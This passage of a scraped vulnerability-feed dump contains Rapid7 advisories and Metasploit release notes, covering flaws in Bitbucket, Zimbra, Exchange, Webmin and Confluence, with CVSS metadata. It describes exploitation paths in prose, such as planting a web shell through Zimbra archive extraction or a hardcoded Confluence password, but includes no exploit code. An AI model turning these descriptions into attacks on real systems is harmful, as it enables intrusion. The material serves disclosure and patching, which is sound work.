prior to 7.6.17 \nBitbucket Server and Data Center 7.17 prior to 7.17.10 \nBitbucket Server and Data Center 7.21 prior to 7.21.4 \nBitbucket Server and Data Center 8.0 prior to 8.0.3 \nBitbucket Server and Data Center 8.1 prior to 8.1.3 \nBitbucket Server and Data Center 8.2 prior to 8.2.2 \nBitbucket Server and Data Center 8.3 prior to 8.3.1\n\n## Mitigation guidance\n\nOrganizations that use Bitbucket Server and Data Center in their environments should patch as quickly as possible [using Atlassian's guide](<https://confluence.atlassian.com/bitbucketserver/bitbucket-server-upgrade-guide-776640551.html>), without waiting for a regular patch cycle to occur. Blocking network access to Bitbucket may also function as a temporary stop-gap solution, but this should not be a substitute for patching.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-36804 with an unauthenticated vulnerability check in the September 20, 2022 content release (`ContentOnly-content-1.1.2653-202209202050`).\n\nA detection rule, `Suspicious Process - Atlassian BitBucket Spawns Suspicious Commands`, was deployed to InsightIDR around 10am ET on September 22, 2022.\n\n## Updates\n\n**September 22, 2022 10:00AM ET** \nUpdated Rapid7 customers section to include information on a new IDR detection rule.\n\n**September 26, 2022 10:30 AM EDT** \nUpdated to reflect reports of exploitation in the wild.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe\n\n \n\n\n_**Additional reading:**_\n\n * _[Active Exploitation of Multiple Vulnerabilities in Zimbra Collaboration Suite](<https://www.rapid7.com/blog/post/2022/08/17/active-exploitation-of-multiple-vulnerabilities-in-zimbra-collaboration-suite/>)_\n * _[Active Exploitation of Atlassian\u2019s Questions for Confluence App CVE-2022-26138](<https://www.rapid7.com/blog/post/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/>)_\n * _[Exploitation of Mitel MiVoice Connect SA CVE-2022-29499](<https://www.rapid7.com/blog/post/2022/07/07/exploitation-of-mitel-mivoice-connect-sa-cve-2022-29499/>)_\n * _[CVE-2022-27511: Citrix ADM Remote Device Takeover](<https://www.rapid7.com/blog/post/2022/06/16/cve-2022-27511-citrix-adm-remote-device-takeover/>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-20T15:14:26", "type": "rapid7blog", "title": "CVE-2022-36804: Easily Exploitable Vulnerability in Atlassian Bitbucket Server and Data Center", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26138", "CVE-2022-27511", "CVE-2022-29499", "CVE-2022-36804"], "modified": "2022-09-20T15:14:26", "id": "RAPID7BLOG:BCF3916E38EC7840E9BABBDD5431352B", "href": "https://blog.rapid7.com/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-26T22:02:56", "description": "## Zimbra Auth Bypass to Shell\n\n\n\n[Ron Bowes](<https://github.com/rbowes-r7>) added an exploit [module](<https://github.com/rapid7/metasploit-framework/pull/16922>) that targets multiple versions of Zimbra Collaboration Suite. The module leverages an authentication bypass (CVE-2022-37042) and a directory traversal vulnerability (CVE-2022-27925) to gain code execution as the `zimbra` user. The auth bypass functionality correctly checks for a valid session; however, the function that performs the check does not return and instead proceeds with execution. Because of this, an attacker only needs a valid account to get a shell. The directory traversal vulnerability lives in Zimbra\u2019s Zip file extraction functionality, enabling an attacker to write an arbitrary file to a web directory. Coupling those two vulnerabilities together, the module writes a JSP shell to the target via a POST request to the `/mboximport` endpoint. These vulnerabilities have been [reported](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>) as exploited in the wild.\n\n## Another Deserialization Flaw in Exchange\n\nOur very own [zeroSteiner](<https://github.com/zeroSteiner>) submitted a new [module](<https://github.com/rapid7/metasploit-framework/pull/16915>) that exploits an authenticated .Net deserialization vulnerability in Microsoft Exchange. The vulnerability is due to a flaw in the `ChainedSerializationBinder`, a type validator for serialized data. Provided the attacker has credentials for at least a low-privileged user, this exploit will result in code execution as `NT AUTHORITY\\SYSTEM`.\n\n## New module content (2)\n\n * [Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925)](<https://github.com/rapid7/metasploit-framework/pull/16922>) by Ron Bowes, Volexity Threat Research, and Yang_99's Nest, which exploits [CVE-2022-37042](<https://attackerkb.com/topics/BLL1VR8x6z/cve-2022-37042?referrer=blog>) \\- adds a module for CVE-2022-27925 and CVE-2022-37042. An attacker can exploit these issues to bypass authentication and then exploit a ZIP file path directory traversal vulnerability to gain RCE as the `zimbra` user.\n * [#16915](<https://github.com/rapid7/metasploit-framework/pull/16915>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- A new module has been added for CVE-2022-23277 which is another ChainedSerializationBinder bypass that results in RCE on vulnerable versions of Exchange prior to the March 8th 2022 security updates.\n\n## Enhancements and features (6)\n\n * [#16701](<https://github.com/rapid7/metasploit-framework/pull/16701>) from [jbaines-r7](<https://github.com/jbaines-r7>) \\- This improves the original `auxiliary/scanner/http/cisco_asa_asdm` scanner module by adding the ability to brute force the Cisco ASA's Clientless SSL VPN (webvpn) interface. The old module has been replaced by two new modules, this one and `auxiliary/scanner/http/cisco_asa_asdm_bruteforce`, which provide brute force of the Cisco ASA's ASDM interface directly.\n * [#16898](<https://github.com/rapid7/metasploit-framework/pull/16898>) from [bcoles](<https://github.com/bcoles>) \\- This adds a `Msf::Post::Windows::Accounts.domain_controller?` method and removes `is_dc?` methods from several modules in favor of using the new method.\n * [#16899](<https://github.com/rapid7/metasploit-framework/pull/16899>) from [bcoles](<https://github.com/bcoles>) \\- This removes the `domain_list_gen` Meterpreter script which has been replaced by the `post/windows/gather/enum_domain_group_users` post module.\n * [#16907](<https://github.com/rapid7/metasploit-framework/pull/16907>) from [bcoles](<https://github.com/bcoles>) \\- This improves the MS10-092 LPE exploit module. It uses the new task manager mixin, adds additional module metadata, and documentation.\n * [#16912](<https://github.com/rapid7/metasploit-framework/pull/16912>) from [bcoles](<https://github.com/bcoles>) \\- This removes the sound recorder Meterpreter script. It has been replaced by the record_mic post module.\n * [#16938](<https://github.com/rapid7/metasploit-framework/pull/16938>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- The `ldap_query` module has been updated to allow the stored query templates to specify a Base DN prefix. Additionally, two ADCS-related queries that then use this to enumerate certificate authorities and certificate templates.\n\n## Bugs fixed (4)\n\n * [#16925](<https://github.com/rapid7/metasploit-framework/pull/16925>) from [rbowes-r7](<https://github.com/rbowes-r7>) \\- This fixes some issues with the payload generation in the UnRAR generic exploit module (CVE-2022-30333). This also adds the option to provide its own custom payload.\n * [#16931](<https://github.com/rapid7/metasploit-framework/pull/16931>) from [bcoles](<https://github.com/bcoles>) \\- A bug has been fixed in `Rex::Post::Meterpreter::Extensions::Stdapi::AudioOutput.play_file` where a channel would be opened before the path parameter was verified. This could lead to dangling channels being opened which would not be closed until Meterpreter was shut down.\n * [#16935](<https://github.com/rapid7/metasploit-framework/pull/16935>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes multiple SSH warnings when loading msfconsole on Ubuntu 22.04 or the latest Kali version.\n * [#16936](<https://github.com/rapid7/metasploit-framework/pull/16936>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes a crash when using evasion modules when `mingw` is not present on the host machine for generating encrypted payloads.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.2.13...6.2.14](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-08-18T10%3A41%3A42-05%3A00..2022-08-25T17%3A06%3A18%2B01%3A00%22>)\n * [Full diff 6.2.13...6.2.14](<https://github.com/rapid7/metasploit-framework/compare/6.2.13...6.2.14>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-26T21:47:13", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-23277", "CVE-2022-27925", "CVE-2022-30333", "CVE-2022-37042"], "modified": "2022-08-26T21:47:13", "id": "RAPID7BLOG:559E0E8D2A3CCC9876788213E94E36A4", "href": "https://blog.rapid7.com/2022/08/26/metasploit-wrap-up-173/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-10-11T22:01:25", "description": "\n\n_Note: Zimbra release [9.0.0 P27](<https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P27>) addressed this vulnerability on October 10, 2022._\n\n[CVE-2022-41352](<https://nvd.nist.gov/vuln/detail/CVE-2022-41352>) is an unpatched remote code execution vulnerability in Zimbra Collaboration Suite discovered in the wild due to [active exploitation](<https://forums.zimbra.org/viewtopic.php?t=71153&p=306532>). The vulnerability is due to the method (`cpio`) in which Zimbra\u2019s antivirus engine (Amavis) scans inbound emails. Zimbra has provided a [workaround](<https://blog.zimbra.com/2022/09/security-update-make-sure-to-install-pax-spax/>), which is to install the `pax` utility and restart the Zimbra services. Note that `pax` is installed by default on Ubuntu, so Ubuntu-based Zimbra installations are not vulnerable by default.\n\n> **Note:** This vulnerability, CVE-2022-41352 is effectively identical to [CVE-2022-30333](<https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333>) but leverages a different file format (`.cpio` and `.tar` as opposed to `.rar`). It is also a byproduct of a much older (unfixed) vulnerability, [CVE-2015-1197](<https://nvd.nist.gov/vuln/detail/CVE-2015-1197>). While the original CVE-2015-1197 affects most major Linux distros, our research team found that it is **not exploitable** unless a secondary application \u2013 such as Zimbra, in this case \u2013 uses `cpio` to extract untrusted archives; therefore, this blog is only focusing on Zimbra CVE-2022-41352.\n\nRapid7 has published technical documentation, including proof-of-concept (PoC) and indicator-of-compromise (IoC) information, regarding CVE-2022-41352 on [AttackerKB](<https://attackerkb.com/topics/1DDTvUNFzH/cve-2022-41352/rapid7-analysis?utm_source=blog&utm_medium=referral&utm_campaign=etr_cve_2022_41352>).\n\n## Background\n\nTo exploit this vulnerability, an attacker would email a `.cpio`, `.tar`, or `.rpm` to an affected server. When Amavis inspects it for malware, it uses `cpio` to extract the file. Since `cpio` has no mode where it can be securely used on untrusted files, the attacker can write to any path on the filesystem that the Zimbra user can access. The most likely outcome is for the attacker to plant a shell in the web root to gain remote code execution, although other avenues likely exist.\n\nAs of October 6, 2022, CVE-2022-41352 is not patched, but Zimbra has acknowledged the risk of relying on `cpio` in a [blog post](<https://blog.zimbra.com/2022/09/security-update-make-sure-to-install-pax-spax/>) where they recommend mitigations. CVE-2022-41352 was discovered in the wild due to [active exploitation](<https://forums.zimbra.org/viewtopic.php?t=71153&p=306532>). Recently, CISA and others [have warned](<https://www.cisa.gov/uscert/ncas/alerts/aa22-228a>) of multiple threat actors leveraging other vulnerabilities in Zimbra, which makes it likely that threat actors would logically move to exploit this latest unpatched vulnerability, too. In August, Rapid7 reported on the [active exploitation of multiple vulnerabilities in Zimbra Collaboration Suite](<https://www.rapid7.com/blog/post/2022/08/17/active-exploitation-of-multiple-vulnerabilities-in-zimbra-collaboration-suite/>).\n\n## Affected products\n\n**Please note that information on affected versions or requirements for exploitability may change as we learn more about the threat.**\n\nTo be exploitable, two conditions must exist:\n\n 1. A vulnerable version of `cpio` must be installed, which is the case on basically every system (see [CVE-2015-1197](<https://nvd.nist.gov/vuln/detail/CVE-2015-1197>))\n 2. The `pax` utility must **not** be installed, as Amavis prefers `pax` and `pax` is not vulnerable\n\nUnfortunately, `pax` is not installed by default on Red Hat-based distros, and therefore they are vulnerable by default. We tested all (current) Linux distros that Zimbra officially supports in their default configurations and determined the following:\n\nLinux Distro | Vulnerable? \n---|--- \nOracle Linux 8 | Vulnerable \nRed Hat Enterprise Linux 8 | Vulnerable \nRocky Linux 8 | Vulnerable \nCentOS 8 | Vulnerable \nUbuntu 20.04 | Not vulnerable (pax is installed by default) \nUbuntu 18.04 | Not vulnerable (pax is installed, cpio has Ubuntu's custom patch) \n \nZimbra says that their plan is to remove the dependency on `cpio` entirely by making `pax` a prerequisite for Zimbra Collaboration Suite. Moving to `pax` is the best option since `cpio` cannot be used securely (because most major operating systems [removed a security patch](<https://lists.gnu.org/archive/html/bug-cpio/2019-11/msg00016.html>)).\n\n## Remediation\n\nZimbra released a patch for CVE-2022-41352 on October 10, 2022. The patched version is [Zimbra Collaboration Suite 9.0.0 P27](<https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P27>). Organizations that use Zimbra should update immediately, without waiting for a regular patch cycle.\n\nIf you are unable to update your Zimbra version, you can apply [Zimbra's recommended workaround](<https://blog.zimbra.com/2022/09/security-update-make-sure-to-install-pax-spax/>), which is to install the `pax` archive utility, then **restart Zimbra or reboot**. We strongly recommend patching, as 9.0.0 P27 also resolves several other vulnerabilities, including [CVE-2022-37393](<https://attackerkb.com/topics/92AeLOE1M1/cve-2022-37393/rapid7-analysis?referrer=blog>), a root privilege escalation.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-41352 via an authenticated vulnerability check (supported by agent and scanner based assessments) available in the October 6 content release (`ContentOnly-content-1.1.2667-202210061843`). This check will identify systems with an affected version of Zimbra Collaboration Suite installed where the `pax` package is not available. There is no change required to the default scan templates to enable this check.\n\nOur engineering team is working on updated vulnerability checks to account for the newly released patch.\n\n## Updates\n\n**October 6, 2022, 3:30pm ET:** Updated to include information on the newly released InsightVM/Nexpose check for CVE-2022-41352.\n\n**October 11, 2022:** Zimbra has released Zimbra Collaboration Suite 9.0.0 P27 to address this vulnerability, as well as other security issues. Our engineering team is working on updating our vulnerability checks to account for the patch.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-06T17:13:34", "type": "rapid7blog", "title": "Exploitation of Unpatched Zero-Day Remote Code Execution Vulnerability in Zimbra Collaboration Suite (CVE-2022-41352)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1197", "CVE-2022-30333", "CVE-2022-37393", "CVE-2022-41352"], "modified": "2022-10-06T17:13:34", "id": "RAPID7BLOG:9191651E2ECCE625AEB7BDCAD1EA43F6", "href": "https://blog.rapid7.com/2022/10/06/exploitation-of-unpatched-zero-day-remote-code-execution-vulnerability-in-zimbra-collaboration-suite-cve-2022-41352/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-12T19:33:06", "description": "## Putting in the work!\n\n\n\nThis week we\u2019re extra grateful for the fantastic contributions our community makes to Metasploit. The Metasploit team landed more than 5 PRs each from [Ron Bowes](<https://github.com/rbowes-r7>) and [bcoles](<https://github.com/bcoles>), adding some great new capabilities.\n\n[Ron Bowes](<https://github.com/rbowes-r7>) contributed four new modules targeting UnRAR, Zimbra, and ManageEngine ADAudit Plus. These modules offer Metasploit users some excellent new vectors to leverage against targets.\n\nContributions from [bcoles](<https://github.com/bcoles>) offer improvements to various session interactions to make gathering data on targets more robust and consistent.\n\n## Have you seen Cassandra?\n\nAre you using tools to visualize your data? If you are using [`cassandra-web`](<https://github.com/avalanche123/cassandra-web>), a tool made specifically to help you &quot;see&quot; what Cassandra holds, there are new toys for attackers to use to access much more. The new module from [krastanoel](<https://github.com/krastanoel>) targets `cassandra-web` &lt;= 0.5.0 with a directory traversal to read lots of those sensitive details off the target.\n\n## New module content (6)\n\n * [Cassandra Web File Read Vulnerability](<https://github.com/rapid7/metasploit-framework/pull/16851>) by Jeremy Brown and [krastanoel](<https://github.com/krastanoel>) \\- This module exploits an unauthenticated directory traversal vulnerability in Cassandra Web version 0.5.0 and earlier, allowing arbitrary file read with the web server privileges.\n * [UnRAR Path Traversal (CVE-2022-30333)](<https://github.com/rapid7/metasploit-framework/pull/16796>) by [Ron Bowes](<https://github.com/rbowes-r7>) and [Simon Scannell](<https://twitter.com/scannell_simon>), which exploits [CVE-2022-30333](<https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333?referrer=blog>) \\- This adds two modules for CVE-2022-30333, a symlink-based path traversal vulnerability in unRAR 6.11 and earlier (open-source version 6.1.6 and earlier). The first module creates a `.rar` with an arbitrary payload that will be extracted to an arbitrary location. The other one specifically targets Zimbra versions 9.0.0 Patch 24 (and earlier) and 8.8.15 Patch 31 (and earlier). These versions use unRAR to scan incoming email and arbitrary command execution is possible if the installed UnRAR on the OS is vulnerable to the same symlink-based path traversal vulnerability. This module generates the `.rar` file that will need to be emailed to the vulnerable Zimbra server to trigger the payload.\n * [Webmin Package Updates RCE](<https://github.com/rapid7/metasploit-framework/pull/16856>) by [Christophe De La Fuente](<https://github.com/cdelafuente-r7>) and Emir Polat, which exploits [CVE-2022-36446](<https://attackerkb.com/topics/q1u5OOKCDH/cve-2022-36446?referrer=blog>) \\- This module exploits an arbitrary command injection in Webmin versions prior to 1.997.\n * [UnRAR Path Traversal in Zimbra (CVE-2022-30333)](<https://github.com/rapid7/metasploit-framework/pull/16796>) by [Ron Bowes](<https://github.com/rbowes-r7>) and [Simon Scannell](<https://twitter.com/scannell_simon>), which exploits [CVE-2022-30333](<https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333?referrer=blog>) \\- This adds two modules for `CVE-2022-30333`, a symlink-based path traversal vulnerability in unRAR 6.11 and earlier (open source version 6.1.6 and earlier). The first module creates a `.rar` with an arbitrary payload that will be extracted to an arbitrary location. The other one specifically targets Zimbra versions 9.0.0 Patch 24 (and earlier) and 8.8.15 Patch 31 (and earlier). These versions use unRAR to scan incoming email and arbitrary command execution is possible if the installed UnRAR on the OS is vulnerable to the same symlink-based path traversal vulnerability. This module generates the `.rar` file that will need to be emailed to the vulnerable Zimbra server to trigger the payload.\n * [Zimbra zmslapd arbitrary module load](<https://github.com/rapid7/metasploit-framework/pull/16807>) by [Darren Martyn](<https://twitter.com/_darrenmartyn>) and [Ron Bowes](<https://github.com/rbowes-r7>), which exploits [CVE-2022-37393](<https://attackerkb.com/topics/92AeLOE1M1/cve-2022-37393?referrer=blog>) \\- This PR adds a local exploit for Zimbra to go from the zimbra user to root by using a sudo-able executable that can load an arbitrary .so file.\n * [ManageEngine ADAudit Plus CVE-2022-28219](<https://github.com/rapid7/metasploit-framework/pull/16758>) by Naveen Sunkavally and [Ron Bowes](<https://github.com/rbowes-r7>), which exploits [CVE-2022-28219](<https://attackerkb.com/topics/Zx3qJlmRGY/cve-2022-28219?referrer=blog>) \\- This adds a module that leverages a Java deserialization, directory traversal, and a blind XXE injection vulnerability to gain unauthenticated code execution again vulnerable versions of ManageEngine ADAudit Plus.\n\n## Enhancements and features (6)\n\n * [#16800](<https://github.com/rapid7/metasploit-framework/pull/16800>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This adds support for OpenSSL 3 compatibility with legacy ciphers.\n * [#16841](<https://github.com/rapid7/metasploit-framework/pull/16841>) from [bcoles](<https://github.com/bcoles>) \\- This updates the `post/windows/gather/enum_powershell_env` module with a code cleanup and expands the module to support non-Meterpreter session types such as shell sessions and PowerShell sessions.\n * [#16873](<https://github.com/rapid7/metasploit-framework/pull/16873>) from [bcoles](<https://github.com/bcoles>) \\- This PR cleans up enum_artifacts, adds documentation, error handling, YAML file parsing, and support for non-meterpreter sessions.\n * [#16875](<https://github.com/rapid7/metasploit-framework/pull/16875>) from [bcoles](<https://github.com/bcoles>) \\- This PR removes the Remove enum_putty Meterpreter script in favor for the existing post module.\n * [#16876](<https://github.com/rapid7/metasploit-framework/pull/16876>) from [bcoles](<https://github.com/bcoles>) \\- Removed the enum_logged_on_users Meterpreter script in favor for the existing post module\n * [#16878](<https://github.com/rapid7/metasploit-framework/pull/16878>) from [bcoles](<https://github.com/bcoles>) \\- Adds partial support for non-Meterpreter sessions for the enum_logged_on_users post module as well as makes use of the read_profile_list method. Resolves Rubocop and msftidy_docs violations.\n\n## Bugs fixed (1)\n\n * [#16872](<https://github.com/rapid7/metasploit-framework/pull/16872>) from [bcoles](<https://github.com/bcoles>) \\- This PR fixes shell_registry_getvalinfo which was truncating registry values at the first space and normalize_key which was causing a crash when only a hive name was passed to the function when running on a shell session.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.2.11...6.2.12](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-08-04T11%3A39%3A27-05%3A00..2022-08-10T15%3A45%3A22-05%3A00%22>)\n * [Full diff 6.2.11...6.2.12](<https://github.com/rapid7/metasploit-framework/compare/6.2.11...6.2.12>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-12T18:52:27", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-28219", "CVE-2022-30333", "CVE-2022-36446", "CVE-2022-37393"], "modified": "2022-08-12T18:52:27", "id": "RAPID7BLOG:84EC5F57BD07F535627F51F28B2424B1", "href": "https://blog.rapid7.com/2022/08/12/metasploit-weekly-wrap-up-171/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-29T21:59:42", "description": "\n\nExploitation is underway for one of the [trio of critical Atlassian vulnerabilities](<https://confluence.atlassian.com/security/july-2022-atlassian-security-advisories-overview-1142446703.html>) that were published last week affecting several the company\u2019s on-premises products. Atlassian has been a focus for attackers, as it was less than two months ago that we observed exploitation of [CVE-2022-26134 in Confluence Server and Confluence Data Center](<https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/>).\n\n**CVE-2022-26138: Hardcoded password in Questions for Confluence app impacting:**\n\n * Confluence Server\n * Confluence Data Center\n\n**CVE-2022-26136 &amp; CVE-2022-26137: Multiple Servlet Filter vulnerabilities impacting:**\n\n * Bamboo Server and Data Center\n * Bitbucket Server and Data Center\n * Confluence Server and Data Center\n * Crowd Server and Data Center\n * Crucible\n * Fisheye\n * Jira Server and Data Center\n * Jira Service Management Server and Data Center\n\n## CVE-2022-26138: Hardcoded password in Questions for Confluence app\n\nThe most critical of these three is [CVE-2022-26138](<https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>), as it was quickly exploited in the wild once the hardcoded password was released on social media. There is a limiting function here, however, as this vulnerability only exists when the Questions for Confluence app is enabled (and does not impact the Confluence Cloud instance). Once the app is enabled on affected versions, it will create a user account with a hardcoded password and add the account to a user group, which allows access to all non-restricted pages in Confluence. This easily allows a remote, unauthenticated attacker to browse an organization\u2019s Confluence instance. Unsurprisingly, it didn\u2019t take long for Rapid7 to observe exploitation once the hardcoded credentials were released, given the high value of Confluence for attackers who often jump on Confluence vulnerabilities to execute ransomware attacks.\n\n## Affected versions\n\n * Questions for Confluence 2.7.x\n\n * 2.7.34\n * 2.7.35\n * Questions for Confluence\n\n * 3.0.x\n * 3.0.2\n\n## Mitigation guidance\n\nOrganizations using on-prem Confluence should follow Atlassian\u2019s guidance on updating their instance or disabling/deleting the account. Rapid7 recommends organizations impacted by this take steps immediately to mitigate the vulnerability. Atlassian\u2019s advisory also includes information on how to look for evidence of exploitation. An [FAQ](<https://confluence.atlassian.com/kb/faq-for-cve-2022-26138-1141988423.html>) has also been provided.\n\n> Please note: Atlassian\u2019s [Questions For Confluence Security Advisory 2022-07-20](<https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>) has a very important call-out that \u201cuninstalling the Questions for Confluence app does not remediate this vulnerability.\u201d\n\n## CVE-2022-26136 &amp; CVE-2022-26137: Multiple Servlet Filter vulnerabilities\n\nTwo other vulnerabilities were announced at the same time, [CVE-2022-26136 and CVE-2022-26137](<https://confluence.atlassian.com/security/multiple-products-security-advisory-cve-2022-26136-cve-2022-26137-1141493031.html>), which are also rated critical by Atlassian. They both are issues with Servlet Filters in Java and can be exploited by remote, unauthenticated attackers. Cloud versions of Atlassian have already been fixed by the company.\n\nThe list of affected versions is long and can be found on [Atlassian\u2019s Security Advisory](<https://confluence.atlassian.com/security/multiple-products-security-advisory-cve-2022-26136-cve-2022-26137-1141493031.html>).\n\nWhile the impact of these vulnerabilities will vary by organization, as mentioned above, attackers place a high value on many Atlassian products. Therefore, Rapid7 recommends that organizations update impacted product versions as there is no mitigation workaround available.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-26138 with a remote vulnerability check released on July 29, 2022 (ContentOnly-content-1.1.2602-202207292027).\n\n## Updates\n\n07/29/2022 - 5:30 PM EDT \nUpdated Rapid7 customers section to include information on a new remote vulnerability check.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": 